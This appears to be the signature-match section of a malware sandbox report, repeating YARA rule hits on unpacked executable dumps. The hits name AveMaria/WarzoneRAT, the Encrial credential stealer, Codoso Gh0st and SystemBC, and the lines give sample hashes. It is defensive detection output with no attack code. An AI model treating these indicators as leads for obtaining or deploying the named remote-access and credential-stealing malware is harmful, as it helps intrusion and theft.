Source: 19.2.Lrtuqtwk.PIF.20c3d258.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 19.2.Lrtuqtwk.PIF.20c3d258.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 19.2.Lrtuqtwk.PIF.20c3d258.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 19.2.Lrtuqtwk.PIF.20c3d258.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 0.2.qqig1mHX8U.exe.21f874b8.7.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 23.1.kwtqutrL.pif.400000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 23.1.kwtqutrL.pif.400000.1.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 23.1.kwtqutrL.pif.400000.1.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 23.1.kwtqutrL.pif.400000.1.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 23.1.kwtqutrL.pif.400000.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 23.1.kwtqutrL.pif.400000.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 23.1.kwtqutrL.pif.400000.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 0.2.qqig1mHX8U.exe.21f6a848.10.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 0.2.qqig1mHX8U.exe.21f6a848.10.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.qqig1mHX8U.exe.21f6a848.10.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 0.2.qqig1mHX8U.exe.21f6a848.10.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 0.2.qqig1mHX8U.exe.21f6a848.10.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 0.2.qqig1mHX8U.exe.21edfd88.9.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 0.2.qqig1mHX8U.exe.21edfd88.9.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.qqig1mHX8U.exe.21edfd88.9.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.qqig1mHX8U.exe.21edfd88.9.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 0.2.qqig1mHX8U.exe.21edfd88.9.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 0.2.qqig1mHX8U.exe.21edfd88.9.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 0.2.qqig1mHX8U.exe.21edfd88.9.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 0.2.qqig1mHX8U.exe.21efc9f8.8.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 10.3.kwtqutrL.pif.211515e8.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 10.3.kwtqutrL.pif.211515e8.4.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.3.kwtqutrL.pif.211515e8.4.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 10.3.kwtqutrL.pif.211515e8.4.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 10.3.kwtqutrL.pif.211515e8.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 10.3.kwtqutrL.pif.211515e8.4.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 10.3.kwtqutrL.pif.211515e8.4.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 0.2.qqig1mHX8U.exe.21edfd88.9.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 0.2.qqig1mHX8U.exe.21edfd88.9.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.qqig1mHX8U.exe.21edfd88.9.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 0.2.qqig1mHX8U.exe.21edfd88.9.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 0.2.qqig1mHX8U.exe.21edfd88.9.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 21.2.kwtqutrL.pif.400000.7.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 21.2.kwtqutrL.pif.400000.7.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 21.2.kwtqutrL.pif.400000.7.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 21.2.kwtqutrL.pif.400000.7.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 21.2.kwtqutrL.pif.400000.7.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 21.2.kwtqutrL.pif.400000.7.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 21.2.kwtqutrL.pif.400000.7.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 10.3.kwtqutrL.pif.21166898.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 10.3.kwtqutrL.pif.21166898.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.3.kwtqutrL.pif.21166898.2.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 10.3.kwtqutrL.pif.21166898.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 10.3.kwtqutrL.pif.21166898.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 10.3.kwtqutrL.pif.21166898.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 10.3.kwtqutrL.pif.21166898.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.3.kwtqutrL.pif.21166898.1.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 10.3.kwtqutrL.pif.21166898.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 10.3.kwtqutrL.pif.21166898.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 10.3.kwtqutrL.pif.21152e58.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 10.3.kwtqutrL.pif.21152e58.5.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.3.kwtqutrL.pif.21152e58.5.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 10.3.kwtqutrL.pif.21152e58.5.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 10.3.kwtqutrL.pif.21152e58.5.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 10.3.kwtqutrL.pif.21152e58.5.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 10.3.kwtqutrL.pif.21152e58.5.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 19.2.Lrtuqtwk.PIF.20c205e8.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 19.2.Lrtuqtwk.PIF.20c205e8.2.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 19.2.Lrtuqtwk.PIF.20c205e8.2.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 19.2.Lrtuqtwk.PIF.20c205e8.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 19.2.Lrtuqtwk.PIF.20c205e8.2.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 10.2.kwtqutrL.pif.400000.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 10.2.kwtqutrL.pif.400000.4.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.kwtqutrL.pif.400000.4.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 10.2.kwtqutrL.pif.400000.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 10.2.kwtqutrL.pif.400000.4.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 0.2.qqig1mHX8U.exe.21f6a848.10.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 0.2.qqig1mHX8U.exe.21f6a848.10.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.qqig1mHX8U.exe.21f6a848.10.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 0.2.qqig1mHX8U.exe.21f6a848.10.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 0.2.qqig1mHX8U.exe.21f6a848.10.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 10.2.kwtqutrL.pif.400000.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 10.2.kwtqutrL.pif.400000.4.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.kwtqutrL.pif.400000.4.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 10.2.kwtqutrL.pif.400000.4.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 10.2.kwtqutrL.pif.400000.4.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 10.2.kwtqutrL.pif.400000.4.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 10.2.kwtqutrL.pif.400000.4.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 21.2.kwtqutrL.pif.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 21.2.kwtqutrL.pif.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 21.2.kwtqutrL.pif.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 21.2.kwtqutrL.pif.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 21.2.kwtqutrL.pif.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
Source: 19.2.Lrtuqtwk.PIF.20c205e8.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
Source: 19.2.Lrtuqtwk.PIF.20c205e8.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 19.2.Lrtuqtwk.PIF.20c205e8.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
